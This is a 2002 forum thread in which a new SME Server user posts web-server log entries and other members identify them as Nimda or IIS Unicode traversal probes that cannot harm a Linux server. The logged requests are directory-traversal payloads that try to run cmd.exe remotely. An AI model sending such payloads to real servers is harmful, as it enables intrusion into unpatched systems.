Koozali.org: home of the SME Server

Legacy Forums => General Discussion (Legacy) => Topic started by: Christian on June 28, 2002, 02:57:16 PM

Title: NIMBA
Post by: Christian on June 28, 2002, 02:57:16 PM

I just downloaded SME server from a NL ftp mirror.
6 hours after instalation this code was found in HTTP log
Is it a Virus "Nimba" ????
If yes, How can it be in SME server so fast????????????????
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
"GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
"GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
"GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
"GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-"
"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
"GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
"GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
"GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
"GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
"GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
"GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"

Christian. Denmark

Title: Re: NIMBA
Post by: Jon Blakely on June 28, 2002, 04:12:40 PM

Christian,

Yes that is NIMDA but it is nothing to worry about, apart from wasting a bit of bandwidth it is harmless. It only affects M$ IIS web servers.
It is not in your server but is infected M$ servers trying to give it you.
You will probably get another one that is a string of NNNNNNN's. That is Code Red or Code Red II. It is also harmless.

Jon

Title: Re: NIMBA
Post by: Holger on June 28, 2002, 04:15:02 PM

Hej Christian

I think everybody gets those if you're connected to the internet!

It is showing that somebody or something (script kiddies or a vira) is attempting to exploit some security vulnerabilities. Only they are _very_ stupid, since they have not detected that your box is not a windoze box.

Don't worry - it's not harmfull to you except for your lost bandwidth and cpu cycles.

There's nothing you can do about it either :(
It's just the common general pollution of the internet.

Holger

Title: Re: NIMBA
Post by: Johan on June 29, 2002, 03:19:31 PM

It's not nimda,

it's someone who scans your serv for security flaws..
in this case  he's scanning for the unicode-bug...
but u don;t have to worry,.. you don;t have Nt/iis :)

greetzz

Title: Re: NIMBA --THANKS ALL
Post by: Christian on June 29, 2002, 11:12:17 PM

Thanks all
I'm new to these servers, have only been working with windows 2000 adv srv.
So thanks again....

Christian.....
one never gets to old to learn something new